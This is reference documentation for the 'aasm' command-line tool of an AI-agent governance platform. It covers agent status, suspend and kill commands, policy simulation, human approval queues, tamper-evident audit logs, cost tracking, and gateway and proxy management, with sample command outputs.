aasm follows the standard convention:

0 — success.
non-zero — failure. Common causes: the gateway is unreachable, the API returned a non-2xx status, a named context was not found, a file failed to parse, or a validation/simulation step found problems.

Some commands give the exit code a documented meaning so it can gate CI:

Command	Non-zero exit means
`aasm status`	Gateway unreachable, any agent has violations, or storage health probe reports `unavailable`.
`aasm policy simulate`	The simulation detected policy violations.
`aasm policy validate`, `aasm config validate`	The file is invalid (error printed to stderr).
`aasm audit verify-chain`	The audit hash chain failed verification.

Command groups

Command	Talks to	Purpose
`aasm status`	Gateway HTTP	Fleet health, agents, approvals, budget at a glance.
`aasm agent`	Gateway HTTP	List, inspect, suspend, resume, kill registered agents.
`aasm policy`	Gateway HTTP + local	Apply, version, diff, simulate, validate, show policies.
`aasm topology`	Gateway HTTP	Visualize agent trees, teams, lineage, stats.
`aasm alerts`	Gateway HTTP	List, inspect, resolve governance alerts.
`aasm approvals`	Gateway HTTP + WS	Human-in-the-loop approval queue.
`aasm audit`	Gateway HTTP + local	Query, export, verify, and compliance-export audit data.
`aasm logs`	Gateway HTTP + WS	Query and stream audit-log events.
`aasm trace`	Gateway HTTP	Visualize a single session trace.
`aasm cost`	Gateway HTTP	Cost summary and monthly forecast.
`aasm dashboard`	Gateway HTTP/WS + local	TUI dashboard and embedded SPA server.
`aasm gateway`	Local process	Manage the `aa-gateway` daemon.
`aasm proxy`	Local process	Manage the `aa-proxy` sidecar and its CA.
`aasm start` / `aasm stop`	Local process	Start/stop the locally-managed gateway.
`aasm sandbox`	Local	Run a WASM tool under the sandbox.
`aasm config`	Local	Validate / boot an `agent-assembly.toml`.
`aasm context`	Local	Manage `~/.aa/config.yaml` contexts.
`aasm admin`	Gateway HTTP	Administrative operations (retention).
`aasm version`	Gateway HTTP	CLI + gateway/api versions.
`aasm completion`	Local	Generate shell completion scripts.

Developer-only commands. The source tree also defines aasm run (launch a governed AI dev tool) and aasm tools (discover installed AI dev tools). Both are gated behind the devtool region in aa-cli/src/commands/mod.rs and aa-cli/Cargo.toml and are stripped from the published crate by .ci/strip-for-publish.sh before release. They are intentionally not documented here because they are not part of the published aasm surface.

Last updated: 2026-06-11 by Chisanan232

aasm status

Show fleet health, agents, approvals, and budget at a glance. aasm status fetches the deployment overview, runtime health, agent list, pending approvals, cost rollup, and storage health from the gateway in one shot and renders a dashboard-style summary.

Synopsis

aasm status [OPTIONS]

This command has no subcommands.

Options

Flag	Type	Default	Description
`--watch`	flag	off	Auto-refresh the status display every 5 seconds. Runs until interrupted (Ctrl-C).
`--json`	flag	off	Print only the deployment-overview header as machine-readable JSON (the AAASM-1579 contract). Distinct from `--output json`, which serializes the full snapshot.

Plus the global options.

Exit code

0 — all healthy.
non-zero — the gateway is unreachable, at least one agent has violations, or the storage health probe reports unavailable. All failure modes collapse to a single non-zero code so shell scripts can gate on it.

Examples

Show the full status summary:

aasm status

Agent Assembly Status
─────────────────────────────────────
  Mode:      local
  Gateway:   http://localhost:7391
  Storage:   sqlite  (~/.aasm/local.db)
  Version:   0.0.1
  Uptime:    2h 15m 33s
  Health:    ✓ ok
─────────────────────────────────────

Active Agents
  ID        NAME            FRAMEWORK   STATUS   SESSIONS   VIOLATIONS   LAST EVENT
  a1b2…     research-bot    langgraph   active   3          0            2m ago tool_call

Pending Approvals: 1  (oldest 2m 15s)
Budget: $12.50 / $50.00 daily  ███████░░░░░░░░░░░░░  25%

Continuously refresh:

aasm status --watch

Machine-readable deployment header for CI:

aasm status --json

{
  "mode": "local",
  "gateway_url": "http://localhost:7391",
  "storage_backend": "sqlite",
  "storage_path": "~/.aasm/local.db",
  "version": "0.0.1",
  "uptime_secs": 8133,
  "health": "ok"
}

Full snapshot as JSON (every section):

aasm status --output json

Last updated: 2026-06-11 by Chisanan232

aasm agent

Manage monitored agent processes registered with the gateway.

Synopsis

aasm agent <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`list`	List all registered agents.
`inspect`	Show detailed information about one agent.
`suspend`	Suspend a running agent.
`resume`	Resume a suspended agent.
`kill`	Deregister and terminate an agent.

All subcommands accept the global options, including --output table|json|yaml.

aasm agent list

List all registered agents, with optional client-side filters.

Options

Flag	Type	Default	Description
`--status <STATUS>`	string	—	Filter by agent status (e.g. `Active`, `Suspended`, `Deregistered`).
`--framework <FRAMEWORK>`	string	—	Filter by agent framework (e.g. `langgraph`, `crewai`).
`--watch`	flag	off	Auto-refresh the table every 2 seconds.

Example

aasm agent list --status Active --framework langgraph

ID        NAME           FRAMEWORK   VERSION   STATUS    TOOLS
a1b2c3…   research-bot   langgraph   1.2.0     Active    search, fetch

aasm agent inspect

Render a detailed key-value view of a single agent: identity, status, tools, metadata, active sessions, recent events, and recent trace session IDs.

Arguments

Argument	Type	Description
`<AGENT_ID>`	string	Hex-encoded agent UUID to inspect.

Example

aasm agent inspect a1b2c3d4e5f600112233445566778899

Agent a1b2c3d4…
  Name:        research-bot
  Framework:   langgraph 1.2.0
  Status:      Active
  PID:         48213
  Sessions:    3
  Violations:  0
  Tools:       search, fetch, summarize
  Recent traces:
    7f3a…  2026-06-09T14:02:11Z   (aasm trace 7f3a…)

aasm agent suspend

Suspend a running agent. The reason is logged for audit.

Arguments / options

Name	Type	Default	Description
`<AGENT_ID>`	string (arg)	—	Hex-encoded agent UUID to suspend.
`--reason <REASON>`	string	required	Reason for suspending (logged for audit).
`--force`	flag	off	Skip the confirmation prompt.

Example

aasm agent suspend a1b2c3… --reason "investigating cost spike" --force

Suspended a1b2c3… : Active → Suspended

aasm agent resume

Resume a previously suspended agent.

Arguments

Argument	Type	Description
`<AGENT_ID>`	string	Hex-encoded agent UUID to resume.

Example

aasm agent resume a1b2c3…

Resumed a1b2c3… : Suspended → Active

aasm agent kill

Deregister and terminate an agent.

Arguments / options

Name	Type	Default	Description
`<AGENT_ID>`	string (arg)	—	Hex-encoded agent UUID to kill.
`--force`	flag	off	Skip the confirmation prompt.

Example

aasm agent kill a1b2c3… --force

Killed a1b2c3… — deregistered and terminated.

Last updated: 2026-06-11 by Chisanan232

aasm policy

Manage governance policies — apply new versions, inspect history, roll back, diff, simulate, validate locally, and view effective policy.

Synopsis

aasm policy <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`apply`	Apply a policy YAML file and save it to version history.
`history`	List recent policy versions.
`rollback`	Roll back to a previous version.
`diff`	Show the diff between two versions.
`simulate`	Dry-run a policy against historical events or live traffic.
`validate`	Validate a policy YAML file locally (no apply).
`get`	Show the active policy YAML (or a specific version).
`list`	List all deployed policies.
`show`	Show an agent’s effective policy view.

All subcommands accept the global options.

aasm policy apply

Apply a policy YAML file and save it to version history.

Name	Type	Default	Description
`<FILE>`	path (arg)	—	Path to the policy YAML file.
`--applied-by <APPLIED_BY>`	string	—	Identity of the person or system applying the policy.

aasm policy apply ./policies/prod.yaml --applied-by alice@example.com

Applied policy 9f2c1a (version 2026-06-09T14:00:00Z) — active, 12 rules

aasm policy history

List recent policy versions.

Name	Type	Default	Description
`-n, --limit <LIMIT>`	integer	`10`	Maximum number of versions to show.

aasm policy history -n 5

aasm policy rollback

Roll back to a previous policy version, making it active again.

Name	Type	Description
`<VERSION>`	string (arg)	Version identifier (SHA-256 prefix) to roll back to.

aasm policy rollback 9f2c1a

aasm policy diff

Show a colorized unified diff between two policy versions. Colors are suppressed when stdout is not a TTY.

Name	Type	Description
`<VERSION_A>`	string (arg)	First version identifier (SHA-256 prefix).
`<VERSION_B>`	string (arg)	Second version identifier (SHA-256 prefix).

aasm policy diff 9f2c1a 7ab310

aasm policy simulate

Simulate a policy against historical audit events or live traffic without enforcing it. Exits non-zero if the simulation detects any violation, so it can gate a CI pipeline.

Flag	Type	Default	Description
`--policy <POLICY>`	path	required	Path to the policy YAML file to simulate.
`--against <AGAINST>`	path	—	Audit-log JSONL file to replay against the policy.
`--live`	flag	`false`	Observe live agent traffic instead of replaying a file.
`--duration <DURATION>`	string	—	Duration for live simulation (e.g. `60s`, `5m`).
`--output-file <OUTPUT_FILE>`	path	—	Write the simulation report JSON here. (Named `--output-file` to avoid colliding with the global `--output`.)

aasm policy simulate --policy ./candidate.yaml --against ./audit/session.jsonl

Simulation: 412 events, 3 would-be violations
  deny  file_write  /etc/passwd   (rule: block-system-paths)
exit status: 1

aasm policy validate

Validate a policy YAML file locally (no apply, no gateway contact). Exits 0 when valid, 1 with error details on stderr otherwise.

Name	Type	Description
`<FILE>`	path (arg)	Path to the policy YAML file to validate.

aasm policy validate ./policies/prod.yaml

✓ policy valid — 12 rules

aasm policy get

Show the currently active policy YAML, or a specific version.

Flag	Type	Default	Description
`--version <VERSION>`	string	(latest active)	Version identifier (SHA-256 prefix) to retrieve. Omit for the active policy.

aasm policy get --version 9f2c1a

aasm policy list

List all policies deployed to the governance runtime. Takes no flags of its own (uses the global --output).

aasm policy list --output json

NAME      VERSION                  ACTIVE   RULES
9f2c1a    2026-06-09T14:00:00Z     yes      12
7ab310    2026-06-01T09:30:00Z     no       11

aasm policy show

Show an agent’s effective policy view. By default prints the agent identity; add a flag to expand into the capability cascade or budget rollup.

Name	Type	Default	Description
`<AGENT_ID>`	string (arg)	—	Hex-encoded agent UUID (32 hex characters).
`--show-permissions`	flag	off	Print the effective capability set with cascade provenance (granted-by / denied-by scope).
`--show-budget`	flag	off	Print the budget rollup across agent / team / org / subtree.

aasm policy show a1b2c3… --show-permissions

Capability        Effective   Granted by      Denied by
search            Allow       team:research   —
file_write        Deny        —               org

Last updated: 2026-06-11 by Chisanan232

aasm topology

Visualize agent topology — fleet overview, delegation trees, teams, ancestry lineage, and aggregate statistics.

Synopsis

aasm topology <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`overview`	Fleet-wide topology overview.
`tree`	Render a subtree rooted at a given agent.
`team`	Show all agents in a team.
`lineage`	Show the ancestry chain for a given agent.
`stats`	Show aggregate topology statistics.

All subcommands accept the global options, including --output table|json|yaml (tables render via box-drawing trees for tree/lineage).

aasm topology overview

Show a fleet-wide topology overview across all teams and root agents.

Flag	Type	Default	Description
`--status <STATUS>`	string	—	Filter agents by status (`active`, `suspended`, `deregistered`).
`--show-budget`	flag	off	Include governance level in agent nodes.

aasm topology overview --status active

aasm topology tree

Render a delegation subtree rooted at one agent, using box-drawing characters.

Name	Type	Default	Description
`<AGENT_ID>`	string (arg)	—	Root agent ID (hex-encoded UUID).
`--max-depth <DEPTH>`	integer	`10`	Maximum traversal depth from the root.
`--status <STATUS>`	string	—	Filter tree nodes by status.
`--show-budget`	flag	off	Include governance level in tree nodes.

aasm topology tree a1b2c3… --max-depth 3

research-bot (a1b2c3…)
├── fetch-worker (d4e5f6…)
│   └── parse-worker (778899…)
└── summarize-worker (aabbcc…)

aasm topology team

Show all agents belonging to a single team.

Name	Type	Default	Description
`<TEAM_ID>`	string (arg)	—	Team ID.
`--status <STATUS>`	string	—	Filter members by status.
`--show-budget`	flag	off	Include governance level in agent nodes.

aasm topology team research --status active

aasm topology lineage

Show an agent’s complete ancestry chain, ordered root-first.

Name	Type	Default	Description
`<AGENT_ID>`	string (arg)	—	Agent ID (hex-encoded UUID).
`--show-permissions`	flag	off	After the lineage, also print the agent’s effective capability set with cascade provenance.

aasm topology lineage 778899… --show-permissions

root-bot (a1b2c3…)
└── fetch-worker (d4e5f6…)
    └── parse-worker (778899…)   ← target

aasm topology stats

Show aggregate topology statistics — total/root/active/suspended counts, max depth, team sizes, and depth/spawn histograms. Takes no flags of its own (uses the global --output).

aasm topology stats --output json

Total agents:    42
Root agents:     5
Max depth:       4
Active:          38   Suspended: 3   Deregistered: 1
Teams:           5
Avg children/parent: 2.31

Last updated: 2026-06-11 by Chisanan232

aasm alerts

Manage governance alerts — list, inspect, and resolve.

Synopsis

aasm alerts <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`list`	List governance alerts.
`get`	Show full detail for one alert.
`resolve`	Resolve an alert.

All subcommands accept the global options.

aasm alerts list

List governance alerts as a color-coded table, with optional filters.

Flag	Type	Default	Description
`--agent <AGENT>`	string	—	Filter by agent ID.
`--severity <SEVERITY>`	string	—	Filter by severity (`critical`, `warning`, `info`).
`--status <STATUS>`	string	`unresolved`	Filter by status (`unresolved`, `acknowledged`, `resolved`).

aasm alerts list --severity critical

ID       SEVERITY   CATEGORY          STATUS       MESSAGE
al-301   critical   budget            unresolved   team:research over daily cap
al-298   warning    policy_violation  unresolved   file_write denied (agent a1b2c3…)

aasm alerts get

Render a detailed key-value view of one alert.

Argument	Type	Description
`<ALERT_ID>`	string	Alert ID to inspect.

aasm alerts get al-301

aasm alerts resolve

Resolve an alert, optionally attaching a note.

Name	Type	Default	Description
`<ALERT_ID>`	string (arg)	—	Alert ID to resolve.
`--reason <REASON>`	string	—	Optional resolution note.
`--force`	flag	off	Skip the confirmation prompt.

aasm alerts resolve al-301 --reason "raised team cap" --force

Resolved al-301.

Last updated: 2026-06-11 by Chisanan232

aasm approvals

Manage human-in-the-loop approval requests — list pending actions, approve or reject them, and watch for new requests in real time.

Synopsis

aasm approvals <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`list`	List pending (or resolved) approval requests.
`get`	Show details of one request.
`approve`	Approve a pending action.
`reject`	Reject a pending action.
`watch`	Watch for new approval requests over WebSocket.

All subcommands accept the global options.

aasm approvals list

List approval requests as a colored table. The TIMEOUT_IN column is color-coded (red < 60s, yellow 60–180s, green > 180s).

Flag	Type	Default	Description
`--output <FORMAT>`	`table` \| `json` \| `yaml`	global default	Per-command output override.
`--status <STATUS>`	`pending` \| `approved` \| `rejected`	`pending`	Filter by lifecycle status. Resolved history is bounded (default cap 1000).
`--agent <AGENT>`	string	—	Filter to approvals submitted by this agent ID (exact match).

aasm approvals list --status pending

ID        AGENT      ACTION        CONDITION       SUBMITTED_AT          TIMEOUT_IN
ap-77     a1b2c3…    file_write    /etc/hosts      2026-06-09T14:01:00Z  2m 30s

aasm approvals get

Show details of a single pending approval request.

Name	Type	Default	Description
`<ID>`	string (arg)	—	Approval request ID to look up.
`--output <FORMAT>`	`table` \| `json` \| `yaml`	global default	Per-command output override.

aasm approvals get ap-77

aasm approvals approve

Approve a pending action.

Name	Type	Default	Description
`<ID>`	string (arg)	—	Approval request ID to approve.
`--reason <REASON>`	string	—	Optional reason. May also be supplied on piped stdin.

aasm approvals approve ap-77 --reason "verified safe"

Approved ap-77.

aasm approvals reject

Reject a pending action. A reason is required in non-interactive mode (supply --reason or pipe it on stdin).

Name	Type	Default	Description
`<ID>`	string (arg)	—	Approval request ID to reject.
`--reason <REASON>`	string	required (non-interactive)	Reason for rejection. May also be piped on stdin.

aasm approvals reject ap-77 --reason "writes outside allowed path"

Rejected ap-77.

aasm approvals watch

Watch for new approval requests in real time over the gateway WebSocket events endpoint (filtered to approval events).

Flag	Type	Default	Description
`-i, --interactive`	flag	off	Enable interactive mode with keyboard shortcuts (`a`=approve, `r`=reject, `q`=quit; arrow keys navigate).

aasm approvals watch --interactive

▶ ap-78  a1b2c3…  network_egress  api.openai.com   3m 00s
  a approve   r reject   ↑/↓ select   q quit

Last updated: 2026-06-11 by Chisanan232

aasm audit

Query audit log entries and export tamper-evident compliance reports.

Synopsis

aasm audit <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`list`	Query audit log entries with filters.
`export`	Export audit data fetched from the gateway as CSV/JSON/JSONL.
`verify-chain`	Verify the SHA-256 hash chain of a local JSONL audit file.
`compliance-export`	Full-fidelity compliance export of a local JSONL audit file.

All subcommands accept the global options.

Time filters. --since accepts a duration shorthand (30m, 2h, 1d) or an ISO 8601 timestamp; --until accepts an ISO 8601 timestamp.

aasm audit list

Query audit log entries from the gateway (GET /api/v1/logs) with optional filters, rendered as a table (or --output json|yaml). The result column is color-coded: allow=green, deny=red, pending=yellow.

Flag	Type	Default	Description
`--agent <AGENT>`	string	—	Filter by agent identifier.
`--action <ACTION>`	string	—	Filter by action type (e.g. `ToolCallIntercepted`, `PolicyViolation`).
`--result <RESULT>`	`allow` \| `deny` \| `pending`	—	Filter by policy decision result.
`--since <SINCE>`	string	—	Show events after this duration or ISO 8601 timestamp.
`--until <UNTIL>`	string	—	Show events before this ISO 8601 timestamp.
`--limit <LIMIT>`	integer	`50`	Maximum number of entries to return.
`--dry-run-only`	flag	off	Show only observe-mode shadow events (`dry_run: true`). When off (default), shadow events are hidden so you see live enforcement decisions only.

aasm audit list --result deny --since 2h --limit 20

SEQ   TIMESTAMP             AGENT     EVENT             RESULT
142   2026-06-09T14:01:00Z  a1b2c3…   PolicyViolation   deny

aasm audit export

Export audit entries fetched from the gateway to CSV/JSON/JSONL, with optional compliance metadata headers. Writes to stdout unless --output-file is given.

Flag	Type	Default	Description
`--format <FORMAT>`	`csv` \| `json` \| `jsonl`	required	Export file format. JSONL is preferred for SIEM ingestion.
`--compliance <COMPLIANCE>`	`eu-ai-act` \| `soc2`	—	Prepend a compliance metadata header.
`--output-file <OUTPUT_FILE>`	string	(stdout)	Write output to a file. (Named `--output-file` to avoid colliding with the global `--output`.)
`--agent <AGENT>`	string	—	Filter by agent identifier.
`--action <ACTION>`	string	—	Filter by action type.
`--result <RESULT>`	`allow` \| `deny` \| `pending`	—	Filter by policy decision result.
`--since <SINCE>`	string	—	Show events after this duration or ISO 8601 timestamp.
`--until <UNTIL>`	string	—	Show events before this ISO 8601 timestamp.
`--limit <LIMIT>`	integer	`1000`	Maximum number of entries to fetch.

aasm audit export --format jsonl --compliance soc2 --since 1d \
  --output-file audit-2026-06-09.jsonl

aasm audit verify-chain

Verify the SHA-256 hash chain of a local JSONL audit log file. Exits non-zero if the chain is broken (tamper evidence).

Argument	Type	Description
`<PATH>`	path	Path to the JSONL audit log file to verify.

aasm audit verify-chain ./audit/session-7f3a.jsonl

✓ chain valid — 412 entries, genesis → entry 0xab12…

aasm audit compliance-export

Full-fidelity compliance export of a local JSONL audit file. Preserves the SHA-256 hash chain anchors, credential findings (kind + offset only — never the raw secret), and delegation lineage for SIEM ingestion and regulatory review.

Flag	Type	Default	Description
`--input <INPUT>`	path	required	Per-session audit JSONL file produced by the gateway.
`--format <FORMAT>`	`csv` \| `json` \| `jsonl`	`jsonl`	Export format. JSONL is preferred for SIEM/regulator ingestion.
`--compliance <COMPLIANCE>`	`eu-ai-act` \| `soc2`	—	Prepend a compliance framework header.
`--output-file <OUTPUT_FILE>`	path	(stdout)	Write output to a file.
`--agent <AGENT>`	string	—	Filter by hex-encoded agent identifier (32 hex chars).
`--event-type <EVENT_TYPE>`	string	—	Filter by audit event-type label (e.g. `PolicyViolation`).
`--since <SINCE>`	string	—	Include entries after this duration shorthand or ISO 8601 timestamp.
`--until <UNTIL>`	string	—	Include entries before this ISO 8601 timestamp.

aasm audit compliance-export --input ./audit/session-7f3a.jsonl \
  --format jsonl --compliance eu-ai-act --output-file compliance.jsonl

Last updated: 2026-06-11 by Chisanan232

aasm logs

Query and stream audit-log events. In default mode it fetches recent entries over HTTP; with --follow it streams events live over the gateway WebSocket (like tail -f).

Synopsis

aasm logs [OPTIONS]

This command has no subcommands.

Options

Flag	Type	Default	Description
`-f, --follow`	flag	off	Stream events in real time over WebSocket.
`--agent <AGENT>`	string	—	Filter by agent identifier.
`--type <TYPE>`	comma-separated	—	Filter by event type(s). Accepted: `violation`, `approval`, `budget`.
`--since <SINCE>`	string	—	Show events after this duration (`30m`, `2h`, `1d`) or ISO 8601 timestamp.
`--until <UNTIL>`	string	—	Show events before this ISO 8601 timestamp.
`--limit <LIMIT>`	integer	`50`	Maximum number of entries in non-follow mode.
`--no-color`	flag	off	Disable colored output.
`--output <FORMAT>`	`table` \| `json` \| `yaml`	global default	Per-command output override.

Plus the global options.

Examples

Show the last 50 entries:

aasm logs

2026-06-09T14:01:00Z [VIOLATION] a1b2c3…  file_write denied: /etc/passwd
2026-06-09T14:01:05Z [APPROVAL]  a1b2c3…  network_egress pending: api.openai.com

Filter to violations and budget events for one agent:

aasm logs --agent a1b2c3… --type violation,budget --since 1h

Stream live (Ctrl-C to stop):

aasm logs --follow --type violation

Emit JSON for piping into jq:

aasm logs --output json --limit 200 | jq '.[].message'

Last updated: 2026-06-11 by Chisanan232

aasm trace

Visualize a single agent session trace as an indented tree or a horizontal timeline. The trace is fetched from the gateway and the flat span list is folded into a hierarchy (LLM calls, tool calls, tool results, policy allow/deny).

Synopsis

aasm trace [OPTIONS] <SESSION_ID>

This command has no subcommands.

Arguments

Argument	Type	Description
`<SESSION_ID>`	string	Session ID to retrieve the trace for.

Options

Flag	Type	Default	Description
`--format <FORMAT>`	`tree` \| `timeline`	`tree`	Visualization format. `tree` = indented box-drawing tree; `timeline` = horizontal ASCII duration bars.

Plus the global options.

Examples

Tree view (default):

aasm trace 7f3a1c2b

session 7f3a1c2b
├─ 🧠 llm: gpt-4 (1200ms)
│  ├─ 🔧 tool_call: search (340ms)
│  │  └─ 📥 tool_result: search (12ms)
│  └─ ⛔ deny: file_write — path outside allowlist
└─ 🧠 llm: gpt-4 (800ms)

Timeline view:

aasm trace 7f3a1c2b --format timeline

llm: gpt-4        ████████████████████  1200ms
tool_call: search ██████                 340ms
llm: gpt-4        █████████████          800ms

Last updated: 2026-06-11 by Chisanan232

aasm cost

Query cost summary and forecast spending.

Synopsis

aasm cost <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`summary`	Show cost summary for the current period.
`forecast`	Forecast monthly spend from the current daily rate.

Both subcommands accept the global options.

aasm cost summary

Show the cost summary for a time period, optionally grouped by a dimension.

Flag	Type	Default	Description
`--period <PERIOD>`	`today` \| `month`	`today`	Time period to report on.
`--group-by <GROUP_BY>`	`agent`	—	Group spend by dimension.

aasm cost summary --period month --group-by agent

Cost Summary (month, 2026-06)
  Total: $312.40 / $1,000.00  (31.2%)

  AGENT      MONTHLY SPEND
  a1b2c3…    $180.10
  d4e5f6…    $132.30

aasm cost forecast

Forecast monthly spending by extrapolating the current daily rate over the remaining days of the month. Takes no flags of its own (uses the global --output).

aasm cost forecast

Cost Forecast (2026-06-09, day 9 of 30)
  Current daily spend:      $12.50
  Projected monthly spend:  $375.00
  Monthly limit:            $1,000.00
  Projected utilization:    37.5%

Last updated: 2026-06-11 by Chisanan232

aasm dashboard

Real-time governance monitoring. With no subcommand, aasm dashboard opens an interactive terminal (TUI) dashboard. The subcommands manage an embedded single-page-app (SPA) web server instead.

Synopsis

aasm dashboard [SUBCOMMAND] [OPTIONS]

Form	Purpose
`aasm dashboard` (no subcommand)	Open the interactive TUI dashboard.
`start`	Serve the embedded SPA over HTTP.
`open`	Open the browser to an already-running dashboard.
`stop`	Stop a dashboard server started with `start`.

The TUI streams status over HTTP polling plus a WebSocket event feed. Panels: fleet health + agents, event log, budget bars, and the pending-approvals queue with countdown timers. Keyboard shortcuts (Tab/Shift-Tab to cycle panels, arrows to select, a/r to approve/reject, p policy viewer, ? help, q quit).

The dashboard port resolves from (highest first): AASM_DASHBOARD_PORT env var → --port flag → dashboard.port in ~/.aa/config.yaml (default 3000).

aasm dashboard start

Serve the embedded SPA at http://127.0.0.1:<port>. Blocks until Ctrl-C. Reverse-proxies /api/* to the configured gateway.

Flag	Type	Default	Description
`--port <PORT>`	integer	`3000` (config)	Port to listen on. Overrides config; also reads `AASM_DASHBOARD_PORT`.
`--open`	flag	off	Open the system browser once the server is ready.

aasm dashboard start --port 8088 --open

Dashboard serving at http://127.0.0.1:8088  (Ctrl-C to stop)

Once the server is up, the browser opens to the dashboard home / overview — your confirmation that the dashboard is set up and running:

Web dashboard — home/overview view after aasm dashboard start

Navigating to the Live Operations route lays out the L1→L2→L3 traffic pipeline, a tail -f event stream with filters, and the approval queue:

Web dashboard — Live Operations route served by aasm dashboard start

Captured against the open-source local-mode gateway, which serves the SPA but not the live event/approval data API (that is the hosted control plane), so the stream shows “reconnecting…” and the pipeline columns are empty. The chrome and layout are fully real. See Observe in the dashboard for more.

aasm dashboard open

Open the system browser to an already-running dashboard server.

Flag	Type	Default	Description
`--port <PORT>`	integer	`3000` (config)	Port to connect to. Overrides config; also reads `AASM_DASHBOARD_PORT`.

aasm dashboard open --port 8088

aasm dashboard stop

Stop a dashboard server previously started with aasm dashboard start. Takes no flags.

aasm dashboard stop

Dashboard server stopped.

Last updated: 2026-06-12 by Chisanan232

aasm gateway

Manage the aa-gateway governance daemon directly — the process that holds the agent registry, evaluates the policy engine, and writes the audit log.

aasm gateway start runs the gateway with low-level flags (listen address, socket, policy path). For the higher-level local developer workflow (deployment mode + dashboard), see aasm start.

Synopsis

aasm gateway <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`start`	Spawn `aa-gateway` as a detached background process.
`stop`	Terminate a running gateway (SIGTERM → SIGKILL fallback).
`status`	Report whether the gateway is running and serving gRPC.
`logs`	Tail the gateway log file.

aasm gateway start

Spawn aa-gateway in the background (or foreground with --no-detach). The binary is resolved from $PATH, then ~/.cargo/bin, then ./target/release, then ./target/debug.

Flag	Type	Default	Description
`--policy <POLICY>`	path	`$AA_POLICY` → `~/.aasm/policy.yaml` → `/etc/aasm/policy.yaml`	Policy YAML file.
`--listen <LISTEN>`	string	`127.0.0.1:50051`	TCP listen address.
`--socket <SOCKET>`	path	—	Unix domain socket path. Takes precedence over `--listen`.
`--no-detach`	flag	off	Block the caller instead of detaching to the background.
`--log-file <LOG_FILE>`	path	`~/.aasm/logs/gateway.log`	Log file for gateway stdout/stderr.

aasm gateway start --listen 127.0.0.1:50051 --policy ./policy.yaml

aasm gateway stop

Terminate a running gateway gracefully (SIGTERM, escalating to SIGKILL). Takes no flags.

aasm gateway stop

aasm gateway status

Report whether aa-gateway is running and serving gRPC.

Flag	Type	Default	Description
`--json`	flag	off	Emit machine-readable JSON instead of human-readable text.

aasm gateway status --json

{ "running": true, "pid": 48213, "listen": "127.0.0.1:50051", "uptime_seconds": 8133 }

aasm gateway logs

Tail the gateway log file, with optional level filtering. Non-JSON lines pass through so operator notes are preserved.

Flag	Type	Default	Description
`-f, --follow`	flag	off	Stream new log entries in real time (like `tail -f`).
`--lines <LINES>`	integer	`50`	Number of lines to show from the end of the log.
`--level <LEVEL>`	log level	—	Filter entries by minimum severity.
`--log-file <LOG_FILE>`	path	`~/.aasm/logs/gateway.log`	Path to the log file.

aasm gateway logs --follow --level warn

Last updated: 2026-06-11 by Chisanan232

aasm proxy

Manage the aa-proxy sidecar — its lifecycle, the per-host CA trust, and log tailing. The proxy intercepts outbound HTTPS via MitM so network-egress policy can be enforced without code changes (layer 2 of the three-layer model).

Synopsis

aasm proxy <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`start`	Spawn the proxy sidecar (background or foreground).
`stop`	Stop the running proxy.
`status`	Show whether the proxy is running.
`install-ca`	Install the proxy CA into the OS trust store.
`uninstall-ca`	Remove the proxy CA from the OS trust store.
`logs`	Tail the proxy log file.

aasm proxy start

Spawn aa-proxy in the background (or foreground with --no-detach). The binary is resolved from $PATH, then ~/.cargo/bin, then ./target/release.

Flag	Type	Default	Description
`--listen <LISTEN>`	string	`127.0.0.1:8899` (env `AA_PROXY_ADDR`)	Address the proxy listens on.
`--gateway <GATEWAY>`	string	env `AA_GATEWAY_URL`	Gateway URL to forward policy decisions to.
`--ca-dir <CA_DIR>`	path	env `AA_CA_DIR`	Directory for CA certificate and key storage.
`--no-detach`	flag	off	Run in the foreground instead of daemonizing.
`--log-file <LOG_FILE>`	path	—	Redirect proxy stdout/stderr to this file (background mode only).

aasm proxy start --listen 127.0.0.1:8899 --gateway http://localhost:50051

aasm proxy stop

Stop the running proxy sidecar. Takes no flags.

aasm proxy stop

aasm proxy status

Show whether the proxy sidecar is running (confirmed via a TCP connect probe).

Flag	Type	Default	Description
`--json`	flag	off	Emit machine-readable JSON output.

aasm proxy status --json

aasm proxy install-ca

Install the proxy CA certificate into the OS trust store so intercepted TLS connections validate.

Flag	Type	Default	Description
`--ca-dir <CA_DIR>`	path	env `AA_CA_DIR`	Directory where the CA certificate and key are stored.
`--yes`	flag	off	Skip the confirmation prompt.

aasm proxy install-ca --yes

aasm proxy uninstall-ca

Remove the proxy CA certificate from the OS trust store. Same options as install-ca.

Flag	Type	Default	Description
`--ca-dir <CA_DIR>`	path	env `AA_CA_DIR`	Directory where the CA certificate and key are stored.
`--yes`	flag	off	Skip the confirmation prompt.

aasm proxy uninstall-ca --yes

aasm proxy logs

Tail the proxy log file, with optional level/time filtering.

Flag	Type	Default	Description
`-f, --follow`	flag	off	Stream new log entries continuously (like `tail -f`).
`--lines <LINES>`	integer	`50`	Number of lines to show from the end of the log.
`--level <LEVEL>`	string	—	Filter to lines at or above this level: `error`, `warn`, `info`, `debug`.
`--since <DURATION>`	string	—	Show only entries since a relative duration (e.g. `5m`, `1h`, `30s`).

aasm proxy logs --follow --level warn --since 10m

Last updated: 2026-06-11 by Chisanan232

aasm start / aasm stop

Start and stop the locally-managed Agent Assembly gateway. These are the high-level developer-laptop commands: aasm start picks a deployment mode, binds the right address, runs the gateway in the background, and (in local mode) enables the dashboard. aasm stop terminates it gracefully and cleans up the PID file.

For low-level gateway control (explicit listen address, Unix socket, policy path), see aasm gateway.

aasm start

Synopsis

aasm start [OPTIONS]

Options

Flag	Type	Default	Description
`--mode <MODE>`	`local` \| `remote`	`local`	Deployment mode. `local` binds `127.0.0.1` (loopback only); `remote` binds `0.0.0.0`.
`--port <PORT>`	integer	`7391`	TCP port the gateway listens on.
`--config <CONFIG>`	path	`~/.aasm/config.yaml`	YAML config file consumed by the gateway.
`--foreground`	flag	off	Stay in the foreground; do not daemonize.
`--no-dashboard`	flag	off	Disable dashboard serving (even in local mode).

Behavior

Resolve the listen address from mode + port.
Exit early (idempotent) if a gateway is already running at that address — verified by a live PID file and a successful TCP probe.
Spawn aa-gateway (background, or foreground with --foreground).
In background mode, write the PID file and wait for the listener before printing the success banner.

